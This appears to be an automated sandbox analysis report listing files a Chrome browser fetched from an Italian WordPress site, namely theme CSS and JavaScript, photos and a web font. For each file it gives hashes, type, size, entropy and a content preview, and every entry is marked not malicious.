                                                                                                                                              SHA-256:BC0C819BC7DE24CD41C37A564AA1AFB2C10692995F71A2FE639F849C59BDD5DC
                                                                                                                                              SHA-512:11B5C62B5D4F00E5AAAE0E53702469AF2E50D9137309DCEA78851121C857537D3A1101F180663E9E9B1E527306E8C553822A861EB8C38C12C7F929F405A4E332
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/grid_row/grid_row.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================..Layout Grid + Cells..====================================================================================================================================================== */...av-layout-grid-container{width:100%; table-layout: fixed; display: table; border-top-stye:none; border-top-width: 0px;}...flex_cell{display: table-cell; padding:30px; vertical-align: top; }...flex_cell_inner{display: block; position: relative;}.....av-border-top-bottom{border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px;}...av-border-cells .flex_cell{border-left-style: solid; border-left-width:1px;}...av-border-cells .flex_cell:first-child{border:none;}...av-layout-grid-container + .av-layout-grid-container{border-top:none;}....../*no image radius if zero padding cell*/...av-zero-padding .av-hotspot-container-in
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=9, manufacturer=FUJIFILM, model=X-S10, xresolution=138, yresolution=146, resolutionunit=2, software=Adobe Photoshop Lightroom Classic 13.4 (Windows), datetime=2024:07:26 14:17:40], baseline, precision 8, 1500x630, components 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1064197
                                                                                                                                              Entropy (8bit):7.981761717568579
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:JHxmVQSGoe0Vjwmd91GeIll4Fh2rfEOHCnNHx:JgU0w61E0FheZin
                                                                                                                                              MD5:2A205D069189012204AEE5B882EBF9F0
                                                                                                                                              SHA1:B4357A4004072D8A793689BFC8D4D792E5ACCAF6
                                                                                                                                              SHA-256:DFC1D761C4390200D4138CB00F6B35FACEDEC3E2A2E9BE1F1E0A087CC5151CC9
                                                                                                                                              SHA-512:266B5CD10B5D15954D56510687744445E41EBD26CA785449E22BB51EA4843AD99A87441801A4C7DEF4455BC099E93A55F4BB214705F8AF4E630524FFEC0E6C90
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......JFIF..............Exif..II*...............z.......................................(...........1...1.......2...........;...........i...............FUJIFILM..X-S10.................Adobe Photoshop Lightroom Classic 13.4 (Windows)..2024:07:26 14:17:40.YOUGENIO..'........................."...........'....... ...0...................0232............................................................................................$...........,...........4...............................................<.......................D...........L.......................................................................................................................................1.......T...2.......^...3.......~...4...........5.......................G.......2024:07:17 17:12:42.2024:07:17 17:12:42.+02:00..+01:00..+01:00...q'.@B..VLV.@B......d.......d...d...d.......d...d.......d.......1D000530......d.......d.......d.......d...Viltrox.AF 13/1.4 XF..00000404........................................(.....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2479
                                                                                                                                              Entropy (8bit):4.963011236436383
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:ixer0dLTjKeRppewcBavmxYFf9LRS6H2eULXVNbVNN:pr0RKebpew/XhiLbLN
                                                                                                                                              MD5:790E1AD99A07909FFB048F2626A66384
                                                                                                                                              SHA1:7382F718553D587CC674ACBBD739910B14DAE007
                                                                                                                                              SHA-256:67BEDB2EE8610992E6666C8BC8E08192F70F4C9883C16A1671983251D62ACBCF
                                                                                                                                              SHA-512:6CCF318AA3AF251617AAC5B67130D92E3079401264B925E7330CA210362F4040EC84B78169B3716B5E3141F95BFA03408E85E7311957BFC02726F76A8F64690F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icon/icon.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.ICON.====================================================================================================================================================== */../*right icons*/.#top .av_font_icon a{color: inherit; display: block;}..av_font_icon a:hover, .av_font_icon a:focus {text-decoration: none; }..av_font_icon { display:block; text-align: center;}..avia-icon-pos-left {float:left; margin-right: 0.5em;}..avia-icon-pos-right {float: right; margin-left: 0.5em;}...../*tooltip*/..#top .avia-icon-tooltip{ width:250px; font-size: 15px; line-height: 1.6em;}.../*big icon with border*/..av_font_icon.av-icon-style-border .av-icon-char{.-webkit-backface-visibility: hidden; /*fix bug in webkit where item shifts a few px on hover*/.}...av_font_icon.av-icon-style-border .av-icon-char{.-moz-box-sizing: content-box;.-webkit-box-sizing: content-box;
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 1500x630, components 3
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):835036
                                                                                                                                              Entropy (8bit):7.979982287639451
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12288:5vcW0GiI9uhhrqtbdnhGnIruCKa6lDS0Kezf7Mm2DKo521MmnoCCJiyan9rYjJtM:iLIaeteIqCKjT7wvIlyh/MWY
                                                                                                                                              MD5:9589E20DF5D6622D02B50D7FD39FEFD4
                                                                                                                                              SHA1:0AB655B5574DFF4B9EAA2EE7488AC76D7A7E1248
                                                                                                                                              SHA-256:CC253D9002882E1FE40212D055A2D3C61269752D4E0FE5B7AEA1A7D9C7632037
                                                                                                                                              SHA-512:A88DD06FF946A0F76484EFA5B47BC5765970034EFF6A3B57E13EDEDC21CDD144AE795D8273E36395CA57087A3D5E59C91CCCF41E6A55FE667A8C4C39C13E1FA0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2021/06/CiPASSO-Home-1500x630.jpg
                                                                                                                                              Preview:......JFIF.............dICC_PROFILE......Tlcms.0..mntrRGB XYZ ............acspMSFT...................................-lcms................................................desc.......>cprt...H...Lwtpt........chad.......,rXYZ........bXYZ........gXYZ........rTRC....... gTRC....... bTRC....... chrm...0...$mluc............enUS...".....s.R.G.B. .I.E.C.6.1.9.6.6.-.2...1..mluc............enUS...0.....N.o. .c.o.p.y.r.i.g.h.t.,. .u.s.e. .f.r.e.e.l.yXYZ ...............-sf32.......B.......%.......................nXYZ ......o...8.....XYZ ......$.........XYZ ......b.........para..........ff......Y.......[chrm..............T{..L.......&f...\...C....................................................................C.......................................................................v................................................S........................!..1.A.."Q.2aq.#...B..R.....$3b...%Cr.&4..'...56DScs(7EF...................................W......................!1..AQ.aq.."....2......#B...R3b.$r
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):5457
                                                                                                                                              Entropy (8bit):7.211297040750758
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:ghChjyVDHlphgyOUGeGOArHWPaEqFW6+/VyW9+d9Fj4cnwHjj2VdJwq0J4ejySV+:mgyVDOKGaPaEqFW6+wW9I9F0cnsjj6JZ
                                                                                                                                              MD5:DB8521A2325F0489C6D4B31C4FE597B8
                                                                                                                                              SHA1:615CBE6C115923F864CDC1BB06A9151EF6F50B24
                                                                                                                                              SHA-256:2C8BB41B609DCB460668BFCA195CCC889BCAE7FF6F8BEB0E3C8F6C9830D4A7E5
                                                                                                                                              SHA-512:FC34DF0D1ED9D7CFEFFA4DFD3612F2639D23C8715A34B954C29ACED658AF9892AC20DB621C612B30F89A48B82FD1CCCFF8A70E655497C155B5FD9C07AC53DA59
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......X.X.."...................................'....................A1!Qaq...."B...2...........................................................?..!f2....i...B.|.}'._......Y~......A.&|K.....H......&.$.bN.......;.I..N.."..=...G............=(.....J.ezI...........D......XDz...P,.l...5"|.j.......K......X.O..E.>.lC...!`.$.....@.....N.`.....O..?..y~....%....3d|.p$..4(.Do........GN...+3....j...P..T.....Q.4.9 D...k..#..@4 ...f.....BG...T.....P..J.A...@.)d.'.p.~..,..v.a.....)...L.....W..G..e=......".A.@Xv.)m#.).@.....;.S.."..,u.q...y....Dx.z..8.*`..H.PP@O.X.X.I.]0......L=.@.....O...#........-.z......'.D.GAi .P......}.O....j...Yu.X.F...i....gE.CJ...'...9...s....W.......a>..LX....*R..T^...)A$...?...R..@....X....H..E..M'.T.)8..t........RW...T.....z..%..)D...H....:`.J.$..b.=_R@>,....#S..B. XX.......,...$...H\..!l.J.4...)}..T(...
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):6521
                                                                                                                                              Entropy (8bit):3.608873022770343
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:sV6/l9KLvPvHgARGZv8xis1UdladZ2/SDK4soea32pB5xmiY:smbMvPvHgARGZv81fdo/SD74a32KiY
                                                                                                                                              MD5:23EAD2A4210E41EDEC1EB832658C70D5
                                                                                                                                              SHA1:3BDF7DFA0DB381DF05121A685EB7886A4485E176
                                                                                                                                              SHA-256:4608E5697A24255F61DF701FBC0868A521F660C95049986B99FEEB7C212CCD8E
                                                                                                                                              SHA-512:EC741E4F4FCC47E4DCA631A6233DAABEB7BA64781CEE596427B4BC0AE6DD8C862F228F9F2F1592B5589713A80BCFA3B0ECD9DE981C40E970ECA561850DAEC125
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Avia Timeline.// -------------------------------------------------------------------------------------------...(function($) {. "use strict";.. $(window).on('load', function (e) {. if ($.AviaSlider) {. $('.avia-timeline-container').avia_sc_timeline();. }. });... $.fn.avia_sc_timeline = function (options) {.. return this.each(function () {.. var container = this,. timeline_id = '#' + $(this).attr('id'),. timeline = $(timeline_id),. methods;.. methods =. {. // make sure all milestones have the same height in horizontal timelines. matchHeights: function(){.. //date.......this.setMinHeight( $(timeline_id + ' .av-milestone-placement-top .av-milestone-date'), true );........//content.......this.setMinHeight( $(ti
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):8056
                                                                                                                                              Entropy (8bit):4.773168794594566
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:MPVYtfFmJjA14X5aIeivPWbOMF30PvuT/O9qlGXVW15fBFhAtfSY+IQBxF:SjA5YvebOC3ZWpS7h2mJ
                                                                                                                                              MD5:D367FB7182DA13691672DC5FB4062EE2
                                                                                                                                              SHA1:364247F8C2511AA0B801C3BA38FF259C3AB658BE
                                                                                                                                              SHA-256:E67830A7AA3816D2D81D3910B57E724BF3E5C72362690764E7F380F1EF2CFF44
                                                                                                                                              SHA-512:B6EC0AF265E7EEC62FDA4E7819D4E7878D9FB46416BB9B28FAFE1E3D6B834FC4C0B52AACBA415B0331A848A45C999C039C2363E5957407D662024319FEA55825
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.js?ver=6.0.9
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Masonry.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";...$.fn.avia_masonry = function(options)..{...//return if we didnt find anything...if(!this.length) return this;......var the_body = $('body'),....the_win. = $(window),....isMobile = $.avia_utilities.isMobile,....loading = false,....methods = {...........masonry_filter: function()....{.....var current..= $(this),......linktext.= current.html(),.... ..selector.= current.data('filter'),.... ..masonry .= current.parents('.av-masonry:eq(0)'),.... ..container .= masonry.find('.av-masonry-container:eq(0)'),.... ..links..= masonry.find('.av-masonry-sort a'),.... ..activeCat.= masonry.find('.av-current-sort-title');............links.removeClass('active_sort');......current.addClass('active_sort');......container.attr('id', 'masonry_id_'+selector);............if
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4249
                                                                                                                                              Entropy (8bit):4.2791559324031185
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:l7EXF3SFOrbSfS0YCeLw/M81Xif1Ile+96Yczd1Pf/H:qXF3SFOrbSfSXLKM81Xif1Iw+96Ykdpn
                                                                                                                                              MD5:40BF628F0D1CA7E9E8B6A2372F82CAEB
                                                                                                                                              SHA1:A8710B38F79E61346D34BD61F596D2DD6D7EB0FF
                                                                                                                                              SHA-256:802E6AC589C74C9617F5160E5FB0A71D37CE9BCB984E65AE436D1C5D149770ED
                                                                                                                                              SHA-512:534EB010B4EEDB303C7508444888EEA377D38433CCFD406FEFA1724D69D62B237CFAC793A7007222E1AE8E5FF4A5FE5EFD0805FB8B6B06AD9C7A00F0E0DF896F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia-snippet-sticky-header.js?ver=4.5
                                                                                                                                              Preview:(function($).{.. "use strict";. . $(document).ready(function(). {....// decreases header size when user scrolls down. avia_header_size();. });. . . function av_change_class($element, change_method, class_name)..{....if($element[0].classList)...{....if(change_method == "add") ....{.....$element[0].classList.add(class_name);....}....else....{.....$element[0].classList.remove(class_name);....}...}...else...{....if(change_method == "add") ....{.....$element.addClass(class_name);....}....else....{.....$element.removeClass(class_name);....}...}..}......function avia_header_size(). {. var win....= $(window),. header = $('.html_header_top.html_header_sticky #header'),. unsticktop..= $('.av_header_unstick_top');. . if(!header.length && !unsticktop.length) return;. . var logo = $('#header_main .container .logo img, #header_main .container .logo a'),. elements = $('
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=9, manufacturer=FUJIFILM, model=X-S10, xresolution=138, yresolution=146, resolutionunit=2, software=Adobe Photoshop Lightroom Classic 13.4 (Windows), datetime=2024:07:26 14:18:28], baseline, precision 8, 1500x630, components 3
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1239965
                                                                                                                                              Entropy (8bit):7.960786231140686
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:Xe60ItaExfe+3XbR3nhtCgyp9cfrgY005OdIQ8s3zux1dUFybGAW2W:wQ1w+TYg49o0kagxn+2W
                                                                                                                                              MD5:F0579B8AE93BD1FEA23B93C2C436D08D
                                                                                                                                              SHA1:452C4E59A795133CE344275F3ACD8B93E04A4B24
                                                                                                                                              SHA-256:2FE962E388BA7FCAAF4AD6F6BEDD012C7721DBD4928BBD6454096FED37AD0950
                                                                                                                                              SHA-512:5CBA97DB96D0D59ED24911F0F38F68E92974DADC4EA9F9D629FAD2A662F75805D1B2C18474B38F5764C48695D7CCB5D7ACCADF419CE8716E5D87104FB70E26AD
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2024/08/Sala-interna1-1500x630.jpg
                                                                                                                                              Preview:......JFIF............:.Exif..II*...............z.......................................(...........1...1.......2...........;...........i...............FUJIFILM..X-S10.................Adobe Photoshop Lightroom Classic 13.4 (Windows)..2024:07:26 14:18:28.YOUGENIO..'........................."...........'...........0...................0232............................................................................................$...........,...........4...............................................<.......................D...........L.......................................................................................................................................1.......T...2.......^...3.......~...4...........5...................}...........2024:07:17 19:15:38.2024:07:17 19:15:38.+02:00..+01:00..+01:00...Jj.@B..f...@B......d.......d...d...d.......d...d.......d.......1D000530......d.......d.......d.......d...Viltrox.AF 13/1.4 XF..00000404........................................(.....
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2265
                                                                                                                                              Entropy (8bit):4.827101287152053
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:Lf+WE0f1BeVdXr7R8tZcJ+LfDtLA2NhUGmMveuYl0gr:fECeTXaOwRksUIj0D
                                                                                                                                              MD5:529883AE359EE5DAEE35300D215693C8
                                                                                                                                              SHA1:96C69AF51D03E2C9D2AFDCD15269308A04842B97
                                                                                                                                              SHA-256:CC2FC51FC5ADE58E3350056A062F6817C41544909061CA953F4AAA41C1EA6D1B
                                                                                                                                              SHA-512:1B873C71FD93C6CDDA63FFFFDF8E7BDE54E41D37DD7F9ED0EFDAB48585B28584DC6D4AA797663CFAAA32E4580A26DA124756EC95FEABCC42116C0C80003748C3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/hr/hr.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.HR.====================================================================================================================================================== */...hr{.clear: both;.display:block;.width:100%;.height:25px;.line-height:25px;.position: relative;.margin:30px 0;.float:left;.}...hr-inner{.width:100%;.position: absolute;.height:1px;.left:0;.top:50%;.width:100%;.margin-top:-1px;.border-top-width:1px;.border-top-style:solid;.}..#top .hr-invisible, .hr-invisible .hr-inner{margin:0; border:none; }...hr-invisible {float:none;}...hr-full, .hr-big{margin:70px 0;}..hr-full .hr-inner{width:300%; left:-100%;}..hr-full.hr-shadow .hr-inner{ box-shadow:0 1px 2px 0px rgba(0, 0, 0, 0.1);}..sidebar_right .hr-full .hr-inner{left:auto; right:-50px;}..sidebar_left .hr-full .hr-inner{left:-50px;}.....hr-short{height:20px; line-height:20px; margin:30p
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (850)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):851
                                                                                                                                              Entropy (8bit):4.6719894053836635
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:lmcxp9bLpzTTmRGvTUfRGFeOKFzEmL1NLxmFWEDmkFWEhaXBmb:lzxlD0+TYueOkzh19xmpDmkphII
                                                                                                                                              MD5:53796B73587B4A58B8904D127EAA51F9
                                                                                                                                              SHA1:B7160B6CEAEA4E424CF2F9EF31DE57CAC1E04397
                                                                                                                                              SHA-256:E8B5C0F1AAB454E3DD3D47BDB0D6BE1A54C0C350DFF5FEAA3A595937E2006DF1
                                                                                                                                              SHA-512:CFE626692ECAB4FF9EF024B0D427C190F8AA0D944BDF4D353C54215D1113522EA05C58D7AB6DFD2A0FFC11D312C26D65A69886CCDE0CCDC96899AB9C21B79541
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-list-horizontal/style.css?ver=1
                                                                                                                                              Preview:.wpml-ls-legacy-list-horizontal{border:1px solid transparent;padding:7px;clear:both}.wpml-ls-legacy-list-horizontal>ul{padding:0;margin:0 !important;list-style-type:none}.wpml-ls-legacy-list-horizontal .wpml-ls-item{padding:0;margin:0;list-style-type:none;display:inline-block}.wpml-ls-legacy-list-horizontal a{display:block;text-decoration:none;padding:5px 10px;line-height:1}.wpml-ls-legacy-list-horizontal a span{vertical-align:middle}.wpml-ls-legacy-list-horizontal .wpml-ls-flag{display:inline;vertical-align:middle;width:18px;height:12px}.wpml-ls-legacy-list-horizontal .wpml-ls-flag+span{margin-left:.4em}.rtl .wpml-ls-legacy-list-horizontal .wpml-ls-flag+span{margin-left:0;margin-right:.4em}.wpml-ls-legacy-list-horizontal.wpml-ls-statics-footer{margin-bottom:30px}.wpml-ls-legacy-list-horizontal.wpml-ls-statics-footer>ul{text-align:center}.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (360)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2730
                                                                                                                                              Entropy (8bit):4.934182973450626
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:fd0ZdRNsRM9eRM1ZpUMrkD+qvvcwJlFvRVRZNT6T0piVXPA0QeV+aNjTa:iFsMrkD+qRFgei1YLeQaBu
                                                                                                                                              MD5:257E347F8B104D3D4C8940F922C5D9DF
                                                                                                                                              SHA1:7C62445EC075EF44FF4E92B53B788B547E2AC1A6
                                                                                                                                              SHA-256:D71395C8250090D4401566998AEA757176D9A060F34F10A5DFA02954F43C11C3
                                                                                                                                              SHA-512:0238B2527FDA797F35F25ECB2CD3E70AF9798CAED5ABEFF6CC6C476D35A76DCE39415DD1C798579E8D6FBE2B4A2AB3BF4F54B9870A7CC64F4A0B6D65A7F0C759
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Animated Numbers.====================================================================================================================================================== */...avia-animated-number{.display: block;.clear: both;.position: relative;.text-align: center;.}...avia-animated-number:hover{text-decoration: none;}..avia-animated-number-content{line-height: 1.3em;}..avia-animated-number.avia-color-font-light .avia-animated-number-content, .avia-animated-number.avia-color-font-light .heading{.color:#fff;.}...avia-animated-number.avia-color-font-dark .avia-animated-number-content, .avia-animated-number.avia-color-font-dark .heading{.color:#222;.}..#top .avia-color-font-custom .heading {.color: inherit;.}...avia-animated-number.avia-color-font-embossed .avia-single-number{.text-shadow: 0 1px 0 rgb(203, 203, 203), 0 2px 0 rgb(201, 201,
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):3676
                                                                                                                                              Entropy (8bit):4.893827432984945
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:YO3Uejknqcd98d+DYiXKpc7mcG4bRkDf53:YqjknbjmH
                                                                                                                                              MD5:777A2713EE53862260BEE5CB0C33089C
                                                                                                                                              SHA1:C98C8B63E40D551F5A2F5658807660C305E66CFE
                                                                                                                                              SHA-256:5F38C27B1CAA42E09FD9429E5E669A7923BF86DEF89E6326AACE23F0AF10D913
                                                                                                                                              SHA-512:20DC563250091E4CFA6BA7A0962076ABD18C84DE988343E9E6D48D45E558DE2AA24A42A7793BAC13FCA84696F11C6024C34B91B348673C493BD048E51152D478
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:// -------------------------------------------------------------------------------------------.// Tab Shortcode.// -------------------------------------------------------------------------------------------..(function($).{ .."use strict";...$.fn.avia_sc_tabs= function(options)..{...var defaults =...{....heading: '.tab',....content:'.tab_content',....active:'active_tab',....sidebar: false...};.....var win = $(window),....options = $.extend(defaults, options);.....return this.each(function()...{....var container .= $(this),.....tab_titles .= $('<div class="tab_titles"></div>').prependTo(container),.....tabs ..= $(options.heading, container),.....content .= $(options.content, container),.....newtabs .= false,.....oldtabs .= false;......newtabs = tabs.clone();....oldtabs = tabs.addClass('fullsize-tab').attr('aria-hidden', true );....tabs = newtabs;......tabs.prependTo(tab_titles).each(function(i)....{.....var tab = $(this), the_oldtab = false;.......if(newtabs) the_oldtab = oldtabs.filter(
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4975
                                                                                                                                              Entropy (8bit):4.866935622982883
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:kGABUpZN7wgOavwggXNnvxacX5TlUQX33Yi2AdAklbHUt0nnBvpdNqs4JMyqM7w4:ZABUpnLMpdx+QX3xlHxv/NqX7gugeT
                                                                                                                                              MD5:26E6FB56D44A236661556EF720264B89
                                                                                                                                              SHA1:1944F1DE99A0DA954F01518A8256938409F719BE
                                                                                                                                              SHA-256:A996B0EAC3460F60BDD23A78795A049A70483324F2344D52C704365A1537F2DA
                                                                                                                                              SHA-512:8F096A4DADA198A7AE1F9EE43294DB850AD04C7A9776058B9C126F2C2CBCD658F55FE1AD06B74D76F4414F770C7BA927E15ED14E740D48632D2440A5BAE7748A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// Avia Text Rotator..// ..// accordion slider script..// -------------------------------------------------------------------------------------------...$.AviaTextRotator = function(options, slider)..{.. this.$win. .= $( window );.. this.$slider .= $( slider );.. this.$inner. .= this.$slider.find('.av-rotator-text');.. this.$slides.= this.$inner.find('.av-rotator-text-single');.. this.$current = this.$slides.eq(0);.. this.open..= 0;.. this.count..= this.$slides.length;.. .. if($.avia_utilities.supported.transition === undefined)...{....$.avia_utilities.supported.transition = $.avia_utilities.supports('transition');...}......this.browserPrefix .= $.avia_utilities.supported.transition;.. this.cssActive ..= this.browserPrefix !== false ? true : false;...this.property..= this.browserPrefix + 'transform',......//this.cssActive
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 48336, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):48336
                                                                                                                                              Entropy (8bit):7.995815173088384
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:768:aHPbHlNlYMCZibwJi/6WwetfISUeR/nQipVg2Ddz9fZIMiktaFm5x4KSz0h1wO:0DyMYibQi1fI7exQvW9RIMTim56KSz0z
                                                                                                                                              MD5:BFE7AD4AA54CFF8909B2D7632073CC30
                                                                                                                                              SHA1:7C2E625BEA4D449CA78CDE09AB59DC6C9CB4726F
                                                                                                                                              SHA-256:47D477915FA5912616E2DC5DF8C5780F9202671678CF275472BD39F3381C0098
                                                                                                                                              SHA-512:B083C9E0766F281A39F582404F08B3D3314C7757AC151C4CB00BD3CECEB4FA06B12D08D881A2C6BF80A066ECAD22FECE7CFF41269D2DBD2BFE38D873922A31FF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.gstatic.com/s/raleway/v34/1Ptug8zYS_SKggPNyC0ITw.woff2
                                                                                                                                              Preview:wOF2...................S..........................g...l..P?HVAR...`?STAT.8'2..4....../~.....$..U..,.0..<.6.$..T. ..J.. ...[3mq..c..5.Hu..ev.5.c.L6e....<.>U..#0l..h.........F.m........."...,V...\.i....;zG-....%..Nt.j....l..m.p.`=....%...}^B).I.Q..qt.l..l...i.......9~....P.".tj.._?.P.j...B.r...'...Zh...}......M].+......k].!..E<.{.........."........m...$C.."_i.>.i@.=.#......s...........%...;."...U.....n,...DO.W.n..85.._.Bj9..nN.T.xl.U".Xq^...y.......<.2'.... .`...WCT.W........?{wI.!.B..C..B.$..Zh..0/ b.....P.(X..?..._Pi.4;`y....gi.j.Zu=.8......>...*{U..K..X.P.hN......=.....C..,............f.eE.l...e.Y...K.Xf.u.%f...k...+"V.Y"W.bD.*........~.[.~QL.z2.......V.Bd..j.D...]...X.5d........){....G~Q.x....{.{.=\.5.h...DB...H]V'.....<...sD....=D(.......^.&M.2....M(iH.8<........p\d.Wo.....@..A....U..M..K...z".%....n...k.T/a..d(..5s1..P..K..i.]l..+.......ZK7H\D.N...].kL.......^.^...K)(r.J.W..L2Y...?..`.......&.%....{?T.:P9.\%..E*....H....`....r....Q.....Rw....T..}....M
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=15, height=2667, bps=194, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 6D Mark II, orientation=upper-left, width=4000], baseline, precision 8, 5727x1899, components 3
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1101494
                                                                                                                                              Entropy (8bit):7.9387573423984055
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24576:nJuzPp6aib0YJIAADJrU4KoNRSSTLLbhaaIIEzaG:nJuBiPJHGKO7nnI1
                                                                                                                                              MD5:88DE45CAC853143B9E28DB80D4C8E8FA
                                                                                                                                              SHA1:88DD4DD8F801E1800E0A7A94A7BBC4C7FE8F7149
                                                                                                                                              SHA-256:55D363AB641C65F81109115A8DDACE66EC40F1A066581605DD31B970AA6E49A9
                                                                                                                                              SHA-512:29F615C9164F11003D1937F3E230D5B6489FB695B994E54D04B9C20A4F5211DE543595FED4398456E184793184C591CB63C9A6D75FFCAD90CB7A2800A7DAB758
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2019/09/MG_4783-67-copia-2.jpg
